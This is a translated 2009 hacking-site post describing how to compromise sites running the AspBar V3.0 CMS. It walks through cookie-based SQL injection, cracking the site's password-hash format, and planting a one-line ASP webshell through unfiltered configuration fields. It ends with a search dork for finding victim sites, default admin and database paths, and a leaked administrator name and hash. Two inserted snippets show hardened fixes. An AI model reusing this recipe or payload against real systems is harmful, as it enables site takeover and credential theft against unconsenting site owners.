myhack58 | 佚名 (Anonymous) | MYHACK58:62200924974
History: Oct 10, 2009 - 12:00 a.m.

AspBar V3.0 Whole-Site Management System 0day Vulnerability Alert - Black Bar Safety Net

www.myhack58.com

The AspBar V3.0 whole-site management system has a cookie injection vulnerability.

Problem code in Ku_go.asp:

<%
' Request("ku_id") searches QueryString, Form and Cookies, so the value can arrive in a cookie
id = Request("ku_id")
Set rsl = Server.CreateObject("ADODB.Recordset")
' id is concatenated straight into the SQL text without any validation
sqll = "update ku_link set hits=hits+1 where ID=" & id & ""
rsl.Open sqll, conn, 1, 3

Set rs = Server.CreateObject("ADODB.Recordset")
sql = "select * from ku_link where id=" & id
rs.Open sql, conn, 1, 3
%>

The system does ship with an anti-injection routine, but a quick look shows it is very weak: it filters only the Request.QueryString method and does nothing about Request.Form and Request.Cookies, which leaves a lot of security risk. Even so, I played with this system for half a day, a full day in fact, before I got a shell. First, find a site running it, right-click a link on the site, view its properties, and you get an address like http://localhost/Ku_go.asp?ku_id=15, as shown in the figure.
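For comparison, here is a hardened version of the Ku_go.asp counter; this is an added example, not AspBar's code, and it assumes an open ADODB.Connection in the variable conn, as the original does. It reads the id from the query string only, allows nothing but digits, and binds the value as a typed parameter instead of concatenating it into the SQL text.

```asp
<%
' Added example, not AspBar's code: a hardened replacement for the Ku_go.asp
' counter. Assumes an open ADODB.Connection in conn, as the original does.
Option Explicit
Dim id, re, cmd, rs

' Read the id from the query string only. Request("ku_id") also consults
' Request.Form and Request.Cookies, which is how a cookie slips past a
' filter that inspects QueryString alone.
id = Request.QueryString("ku_id")

' Allow nothing but 1 to 9 decimal digits; IsNumeric would also accept
' signs, exponents and hex prefixes.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(id) Then
    Response.Status = "400 Bad Request"
    Response.Write "invalid ku_id"
    Response.End
End If

' Typed parameter: the id is bound as an integer and never becomes part of
' the SQL text, so it cannot alter the statement even if the check is loosened.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "UPDATE ku_link SET hits = hits + 1 WHERE ID = ?"
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(id)) ' 3 = adInteger, 1 = adParamInput
cmd.Execute

' The same bound parameter is reused for the lookup
cmd.CommandText = "SELECT * FROM ku_link WHERE ID = ?"
Set rs = cmd.Execute
%>
```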

Using an injection relay, I injected locally through cookies, as shown in the figure. I got the official site's account and password, but could not find the admin backend, so, depressed, I gave up! Note that you have to add the table name manually!

Later I found another website online that runs this system. Through cookie injection I got the account and password, and this time the backend was there too. But here is the annoying part, and I don't know whether everyone noticed it: the system's password hash is 40 characters long, whereas ordinary MD5 hashes are 16 or 32 characters. After studying it I found the algorithm works like this: of the 40 characters, the first 16 are the 16-character MD5 of the plaintext password, and the other 16 are the MD5 of that 16-character result, the 32-character hash reduced to 16 characters; as for the middle 8 characters, I don't know how they are produced. That is a mouthful; in short, to get the password, take the first 16 characters and crack them, and you have the plaintext. Then I contacted the developer and learned through the exchange that the MD5 algorithm had been written by someone else. Really painstaking! So annoying. Well, after getting the password and entering the backend, the first thing I thought of was to check whether there is a database backup function. Sure enough there is, so I immediately uploaded a picture trojan, ready to back it up. The more disgusting part is that the relative path and the absolute path of the database backup cannot be modified; looking at the source I found an extra readonly, as follows:

<form method="post" action="ku_data.asp?action=BackupData">
<tr>
<td>Current database path (absolute path)
<input name="B_DBpath" type="text" id="B_DBpath" value="../Ku_data/Ku_database.mdb" size="60" class="button1" readonly /></td>
</tr>
<tr>
<td height="25">Backup database directory (absolute path)
<input name="B_BKpath" type="text" id="B_BKpath" value="../Databackup" size="60" class="button1" readonly /></td>
</tr>
<tr>
<td>Backup database name (fill in the name):
<input type="button" name="tjiao" value="add date" />
<input name="B_FileName" type="text" id="B_FileName" value="beifen.sql" size="35" class="button1" readonly />
<input name="submit2" type="submit" value="OK backup" class="button2" /></td>
</tr>

So the path cannot be changed and the backup cannot be made as-is, but this can be a breakthrough: save the page source locally, change the value to the path of your picture trojan, then change the action value of <form method="post" action="ku_data.asp?action=BackupData"> to the full path, i.e. http://www.xxxxx.com/admin/ku_data.asp?action=BackupData, save it, and submit the backup from the local copy. However, when testing, the problem appeared again: the current database path and the backup directory cannot be modified, and changing either of them just jumps to the http://www.xxxxx.com/admin/ku_data.asp?action=BackupData page, while the backup name can be changed freely. After being depressed for a while I looked at the backup code and found something even more disgusting. The backup routine in Ku_Data.asp is written like this:

Sub BackupData()
'On Error Resume Next
Dim FileConnStr, Fileconn, B_DBpath, B_BKpath, B_FileName

B_DBpath = Request.Form("B_DBpath")
B_DBpath = Server.MapPath(B_DBpath) ' the disgusting part is here: the current database path is taken from the form, but this extra line maps it on the server, so a locally modified path is useless
B_BKpath = Request.Form("B_BKpath")
B_BKpath = Server.MapPath(B_BKpath) ' the backup directory is handled the same way
B_FileName = Request.Form("B_FileName") ' only the backup name is taken straight from the local submission

FileConnStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & B_DBpath
Set Fileconn = Server.CreateObject("ADODB.Connection")
Fileconn.Open FileConnStr
' (the remainder of the routine is not shown on the page)
End Sub

Seeing this, since the backup name is taken from the local submission, why not insert a one-line trojan into the current database, back it up in .asp format, and then connect to the backed-up database with the one-line client? The idea is simple, but reality is cruel: I could see the one-liner lying in the database, but connecting produced a syntax error message. It was not my one-liner any more; he had tampered with it. Sad; this road leads nowhere. Then I clicked on system settings, and suddenly had the inspiration to try inserting a one-liner in the website configuration and then connect. The one-liner worked. Looking at the system configuration page Ku_Setup.asp, it is written like this:

If action = "ok" Then
webname = Trim(Request.Form("webname"))
miaoshu = Trim(Request.Form("miaoshu"))
http = Trim(Request.Form("http"))
banben = Trim(Request.Form("banben"))
email = Trim(Request.Form("email"))
dianhua = Trim(Request.Form("dianhua"))
qq = Trim(Request.Form("QQ"))
beian = Trim(Request.Form("beian"))
tongji = Trim(Request.Form("tongji"))
mokuai = Trim(Request.Form("mokuai"))
database = Trim(Request.Form("data"))
indexad = Trim(Request.Form("indexad"))
artad = Trim(Request.Form("artad"))
fenlei = Trim(Request.Form("fenlei"))
cpad = Trim(Request.Form("cpad"))
downad = Trim(Request.Form("downad"))
kaifa = Trim(Request.Form("kaifa"))
ad = Trim(Request.Form("ad"))
voteincdir = Server.MapPath("../ku_inc/Ku_config.asp")
Const ForReading = 1, ForWriting = 2
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.OpenTextFile(voteincdir, ForWriting, True)
' every value below is written verbatim, between quotes, into an executable .asp include
ts.Write ""
ts.Write "<"
ts.Write "%" & vbCrLf
ts.Write " Ku_name=" & """" & webname & """" & vbCrLf
ts.Write " Ku_web=" & """" & miaoshu & """" & vbCrLf
ts.Write " Ku_tongji=" & """" & tongji & """" & vbCrLf
ts.Write " Ku_beian=" & """" & beian & """" & vbCrLf
ts.Write " Ku_net=" & """" & http & """" & vbCrLf
ts.Write " Ku_ban=" & """" & banben & """" & vbCrLf
ts.Write " Ku_email=" & """" & email & """" & vbCrLf
ts.Write " Ku_tel =" & """" & dianhua & """" & vbCrLf
ts.Write " Ku_qq =" & """" & qq & """" & vbCrLf
ts.Write " Ku_webzz =" & """" & kaifa & """" & vbCrLf
ts.Write " Ku_mokuai=" & """" & mokuai & """" & vbCrLf
ts.Write " Ku_database=" & """" & database & """" & vbCrLf
ts.Write " Ku_indexad=" & """" & indexad & """" & vbCrLf
ts.Write " Ku_artad=" & """" & artad & """" & vbCrLf
ts.Write " Ku_fl=" & """" & fenlei & """" & vbCrLf
ts.Write " Ku_cpad=" & """" & cpad & """" & vbCrLf
ts.Write " Ku_downad=" & """" & downad & """" & vbCrLf
ts.Write " Ku_adss=" & """" & ad & """" & vbCrLf
ts.Write "%"
ts.Write ">"
ts.Close
Response.Write "<script language=javascript>"
Response.Write "alert('system-related settings saved successfully!');"
Response.Write "</script>"
Response.Redirect "ku_setup.asp"
End If

The values are taken directly from the form, unfiltered, and written into the ku_inc/Ku_config.asp file. As said earlier, the anti-injection routine only covers QueryString and lets everything else through. I first tested locally, because a one-liner written in the usual format cannot be connected to directly here; after testing, I submitted a one-liner in the format "%><%execute(request("cmd"))%><%'" in the developer field, and after refreshing the page it was not broken!
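One way to write the same include file without letting a form value break out of its string literal; this is an added example, not AspBar's code. It assumes the same form field names and the same target file as the page above, only four of the settings are shown (the rest follow the same loop), and the action flag is assumed to come from Request.Form. The helper doubles quotes and then splits every percent-greater-than and less-than-percent pair so the generated file never contains an ASP block delimiter, while the value itself round-trips unchanged.

```asp
<%
' Added example, not AspBar's code: a safer writer for ku_inc/Ku_config.asp.
' Assumes the form field names used by Ku_setup.asp; only four settings shown.
Option Explicit

' Turn an arbitrary form value into a VBScript string literal.
' Order matters: double the quotes first, then split every percent-greater-than
' and less-than-percent pair, so the ASP parser can never see a block
' delimiter inside the generated file. Line breaks would end the literal early.
Function ConfigLiteral(v)
    Dim s
    s = Replace(v, vbCr, "")
    s = Replace(s, vbLf, "")
    s = Replace(s, """", """""")
    s = Replace(s, "%" & ">", "%"" & "">")
    s = Replace(s, "<" & "%", "<"" & ""%")
    ConfigLiteral = """" & s & """"
End Function

Dim fs, ts, voteincdir, i, names, fields
' Constant name in Ku_config.asp paired with the form field it is read from
names  = Array("Ku_name", "Ku_web", "Ku_net", "Ku_webzz")
fields = Array("webname", "miaoshu", "http", "kaifa")

' Assumed: the action flag is read from Request.Form, never Request(),
' which would also accept a value carried in a cookie.
If Request.Form("action") = "ok" Then
    voteincdir = Server.MapPath("../ku_inc/Ku_config.asp")
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set ts = fs.OpenTextFile(voteincdir, 2, True) ' 2 = ForWriting
    ts.Write "<" & "%" & vbCrLf
    For i = 0 To UBound(names)
        ts.Write " " & names(i) & " = " & ConfigLiteral(Trim(Request.Form(fields(i)))) & vbCrLf
    Next
    ts.Write "%" & ">"
    ts.Close
    Response.Redirect "ku_setup.asp"
End If
%>
```

Fed the payload quoted above, the helper emits the line ` Ku_webzz = """%" & "><" & "%execute(request(""cmd""))%" & "><" & "%'"`, which VBScript evaluates back to the original text as a plain string while the file contains no delimiter for the ASP parser to act on.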

Open the ku_inc/Ku_config.asp page and you see the familiar one-liner; connect to it with the one-line client and you have the shell!

If I had thought of this earlier, I would not have messed around blindly in the database. ╮(╯▽╰)╭

Usage: Google for inurl:Ku_shownews.asp. Backend: admin/Ku_Login.asp. Default database: Ku_data\Ku_database.mdb (downloadable, to go chicken-catching?).

There is also an online editor; its login address is Ku_web/Admin_Login.asp.

The account is guxing; I did not crack the password. The MD5 hash is df8150673aaf363f, crack it yourself if you are interested!

Reproduced from: San ㄗ Feng 訫 locks of love's Blog